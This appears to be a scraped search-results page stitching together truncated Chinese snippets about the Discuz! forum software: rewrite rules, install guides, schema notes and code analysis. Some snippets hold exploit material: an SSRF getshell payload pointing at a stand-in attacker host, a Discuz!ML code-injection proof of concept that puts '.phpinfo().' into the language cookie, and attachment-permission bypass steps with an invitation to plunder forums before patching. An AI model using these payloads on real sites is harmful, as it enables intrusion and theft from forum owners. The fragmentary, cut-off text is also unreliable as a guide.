今天一个找我配置过 lnmp 环境的用户要搭建 Discuz 论坛,但是发现不支持伪静态,站长没怎么折腾过 Discuz,百度下才知道,原来军哥的 LNMP 环境包自带的 DZ 规则不适用于 Discuz...mod=view&aid=$2&page=$3 last; rewrite ^([^\.]*)/forum-(\w+)-([0-9]+)\.html$ $1/forum.php?....]*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/forum.php?....]*)/group-([0-9]+)-([0-9]+)\.html$ $1/forum.php?...1 cd /usr/local/nginx/conf/vhost 编辑对应的网站配置文件,比如 aaa.com.conf 1 vi aaa.com.conf 找到配置中的 1 include discuz.conf
plugin.php robots.txt source template uc_server api archiver connect.php data forum.php...; Query OK, 1 row affected (0.04 sec) mysql> grant all on discuz.* to 'discuz'@'192.168.230.150' identified...> flush privileges; Query OK, 0 rows affected (0.00 sec) 然后使用 http://192.168.230.150/forum.php 可以顺利访问...使用 http://192.168.230.151/forum.php 呢? ? 也许你现在也会有和我之前一样的疑问,为什么呢?...因为WEB 1站点配置好的所有信息均写进了discuz站点目录中的install文件夹,里面包含了数据库的配置和连接信息!! 然后再次在负载均衡server内增加real server添加新机器即可!
概述 Discuz!ML 是一个由 CodersClub.org 创建的多语言,集成,功能齐全的开源网络平台,用于构建像 “社交网络” 这样的互联网社区。该引擎基于 Comsenz Inc....创建的着名的 Discuz!X 引擎开发。 但是,这与常见的 Discuz 论坛还是没多大关系。 影响版本 Discuz! ML v.3.4 Discuz! ML v.3.3 Discuz!...(不愧是官方的 Demo) 分析 主入口是 upload 目录下的 index.php,没有任何参数的情况下直接载入 forum.php 紧接着 forum.php 又加载了两个核心文件,好戏就要开始了...其他地方都是包含,这里有个缓存文件,先不管,继续跟,发现开始加载 forum_index.php form_index.php 的 433 行开始加载模板 include template('diy:forum/discuz...$gid); 之前的那个可控点在这里出现了 紧接着被传入了这个函数之中 checktplrefresh($tplfile, $tplfile, @filemtime(DISCUZ_ROOT .
0X06 利用Discuz的SSRF漏洞GetShell Discuz无条件限制ssrf漏洞(<=3.1测试是有这个漏洞) 实验环境: 172.28.100.109 为Discuz 3.1(Win10)...示例: /forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?.../upload/forum.php?.../upload/forum.php?...PAYLOAD: http://127.0.0.1/Discuz_X3.1/upload/forum.php?
5.检查mysql能否正常登陆和使用: mysql -uroot -p'12345' 下载Discuz的压缩包 检查完以上所有的服务确保正常后就可以开始搭建Discuz了,首先是下载Discuz...,Discuz的压缩包可以在官网下载自己需要的版本:http://www.discuz.net/forum.php 我这里使用的是3.3的UTF8版本: [root@localhost ~]# cd /...connect.php favicon.ico index.php plugin.php source uc_server api.php cp.php forum.php...1、选择“全新安装 Discuz! X (含 UCenter Server)” 如果你之前没有安装过Discuz就选择此项。 2、选择“仅安装 Discuz!...安装完成后点击访问即可,如果你不需要安装Discuz推荐的应用的话: ? 搞定,打完收工: ? 至此,Discuz已经成功地安装完毕!如有问题欢迎私信。
8、恢复数据前请在 Discuz! 安装文件目录下utility文件夹内找到 restore.php 文件,然后将 restore.php 文件上传到程序文件夹data目录下。
discuz 主题表pre_forum_thread 注解 tid mediumint(8) unsigned NOT NULL auto_increment COMMENT '主题id', fid mediumint...COMMENT '主题封面 负数:远程 正数:本地 0:无封面', replycredit smallint(6) NOT NULL default '0' COMMENT '回帖奖励积分主题记录积分值', discuz
一、Discuz介绍 Discuz是国内比较知名的开源论坛了,后来被腾讯收购,Discuz在设计时就考虑了生态体系的建设,支持插件设计,可以让广大开发者朋友来一起建设生态,不得不说设计者是很有商业头脑的...回到话题,我们为什么要学习Discuz的插件设计呢,因为假如我们哪天自己想做一套系统,也要支持插件,可以借鉴下相关的设计。...三、Discuz插件机制实现分析 Discuz插件都是放在 upload/source/plugin目录下,我们一个个来分析实现机制。 以下是其中一个插件的代码目录截图: ?...[CDATA[Discuz!...require_once DISCUZ_ROOT . '.
修改 function_core.php 文件 vim discuz_x3.2/upload/source/function/function_core.php 代码如下,添加红色字体 function...($timestamp % $tplrefresh))) { if(1 || empty($timecompare) || @filemtime(DISCUZ_ROOT....$subtpl) > $timecompare) { require_once DISCUZ_ROOT.’
近日,有网友在乌云上发布了一则Discuz论坛附件下载权限绕过漏洞,能够任意下载带有权限的附件并且无需扣除自身积分。...目前Discuz正在处理中,但暂未放出漏洞补丁,有需要的朋友不妨趁漏洞修补之前到各论坛大肆搜刮一番。...漏洞重现步骤: 找到任一带有权限附件,右键点击选择复制链接地址 得到类似下列网址,将aid=其后部分复制 http://***/forum.php?...MjMyNjM5NnwzMjM4OTQ5OXwxMzk0MTgwMDAwfDM0ODkyN3wxNjY0OTIy 该部分网址为base64加密后密文,使用任意工具进行解密,得到如下原文 其中第四段(348927)为当前用户UID,Discuz...该漏洞在乌云的提交时间为2014-01-15,目前Discuz并未拿出最终处理方案,由于漏洞影响并不严重,预期将在下一版本更新顺带解决。
1、综合建站系统:PageAdmin 官方网站:http://www.pageadmin.net/ 适合网站:企业网站,学校网站,政府网站或新闻门户 2、论坛建站系统:discuz 官方网站:http:...//www.discuz.net/forum.php 适合网站:论坛系统,社区交流 3、博客建站系统:zblog 官方网站:https://www.zblogcn.com/ 适合网站:个人简历,个人博客
定义文件: \source\class\class_core.php 定义: define('DISCUZ_ROOT', substr(dirname(__FILE__), 0, -12)); 说明:...将DISCUZ_ROOT定义为class_core.php当前目录(字符)减去12个字符(即:source\class) 例如: D:\www\source\class\class_core.php dirname...(__FILE__)结果为:D:\www\source\class substr(dirname(__FILE__), 0, -12)结果为:D:\www\ 这样在调用程序discuz内部程序时,只需要知道相对目录就行了..., 例如: require DISCUZ_ROOT.'.
近期我们SINE安全在对discuz x3.4进行全面的网站渗透测试的时候,发现discuz多国语言版存在远程代码执行漏洞,该漏洞可导致论坛被直接上传webshell,直接远程获取管理员权限,linux...discuz漏洞影响范围:discuz x3.4 discuz x3.3 discuz x3.2,版本都受该网站漏洞的影响,漏洞产生的原因是在source目录下function文件夹里function_core.php...discuz漏洞分析 我们来看下刚才产生漏洞的代码,在第535行往下看,有一段代码是这样写的,默认网站系统将缓存数据存储在data文件夹里的template目录中,缓存文件名的命名是由前面的discuz_lang...那这个discuz_lang参数的值是从来获取来的呢?...我们跟进分析网站代码,可以看到是从language语言这一变量里去获取的值,也就是说,我们要利用这个网站漏洞,首先要去改变这个language的值,将恶意代码插入到这个值当中去,POC代码如下: post数据到论坛的forum.php
近期我们SINE安全在对discuz x3.4进行全面的网站渗透测试的时候,发现discuz多国语言版存在远程代码执行漏洞,该漏洞可导致论坛被直接上传webshell,直接远程获取管理员权限,linux...discuz漏洞影响范围:discuz x3.4 discuz x3.3 discuz x3.2,版本都受该网站漏洞的影响,漏洞产生的原因是在source目录下function文件夹里function_core.php...discuz漏洞分析 我们来看下刚才产生漏洞的代码,在第535行往下看,有一段代码是这样写的,默认网站系统将缓存数据存储在data文件夹里的template目录中,缓存文件名的命名是由前面的discuz_lang...那这个discuz_lang参数的值是从来获取来的呢?...post数据到论坛的forum.php页面,将post数据改为:Z3T2_2132_language=en'.phpinfo().'
/source/class/class_core.php';//引入系统核心文件 $discuz = & discuz_core::instance();//以下代码为创建及初始化对象 $discuz-... = '该页面展示Discuz! .../source/class/class_core.php';//引入系统核心文件 $discuz = & discuz_core::instance();//以下代码为创建及初始化对象 $discuz-...,QQ,这里填写关键词'; $metadescription = '该页面展示Discuz! ...="z"> $_G[setting][bbname]» <a href="<em>forum.php</em>
http://www.discuz.net Discuz! 论坛,百万站长的选择,定会给您带来非凡的论坛体验。Discuz! 7.0.0 的推出使Discuz! 的用户体验又上升到了一个新的高度。...本教程讲解的即是如何全新安装Discuz! 7.0.0 FULL(集成了UCenter 安装的版本)。...SupeSite 社区门户,实现CMS 的功能,拥有强大的模型功能,对Discuz! 和UCenter Home 的完美聚合,是您将社区中所有信息进行整合展示的最佳平台。.../ucenter Discuz_X3.2_SC_UTF8.zip # 解压缩到./ucenter [root@docker-04 opt]# cd ....docker-04 ucenter]# cd /var/www/html/ucadmin [root@docker-04 ucadmin]# ls admin.php connect.php forum.php
然后,就是使用了:参考developguide.zip 在代码中,include discuz目录的uc_client/client.php,例如include_once APPPATH . '.....如下图,我就是只安装了discuz,然后自定义添加一个应用~~ 由于我设置了两个应用都同步登录,所以会返回: <script type="text/javascript" src="http://localhost
1、搭建AUT 第一步、下载所需文件 Discuz_***.zip——源码程序文件,是PHP程序,简体中文GBK的下载地址是http://download.comsenz.com/DiscuzX.../3.1/Discuz_X3.1_SC_GBK.zip。...然后安装Discuz程序:会要求确定该程序使用Mysql的哪个库(这里使用默认的test库),期间会要求输入程序的管理员用户admin的密码(特别留意),等待建表脚本执行完成后,就会自动弹出http:/.../127.0.0.1:80/ forum.php网页,此时AUT安装完成啦。
spec: selector: matchLabels: app: discuz tier: mysql strategy: type: Recreate...spec: replicas: 1 selector: matchLabels: app: discuz tier: nginx-php template:...metadata: labels: app: discuz tier: nginx-php spec: imagePullSecrets...spec: type: NodePort ports: - port: 80 nodePort: 30001 selector: app: discuz...data m source api favicon.ico member.php static api.php forum.php
[root@web01 ~]# rz Discuz_X3.3_SC_GBK.zip [root@web01 ~]# unzip Discuz_X3.3_SC_GBK.zip -d /code/discuz...; Query OK, 1 row affected (0.00 sec) MariaDB [(none)]> grant all on discuz.* to discuz@'%' identified...mod=view&aid=$2&page=$3 last; rewrite ^([^\.]*)/forum-(\w+)-([0-9]+)\.html$ $1/forum.php...&fid=$2&page=$3 last; rewrite ^([^\.]*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/forum.php...$2&extra=page%3D$4&page=$3 last; rewrite ^([^\.]*)/group-([0-9]+)-([0-9]+)\.html$ $1/forum.php
领取专属 10元无门槛券
手把手带您无忧上云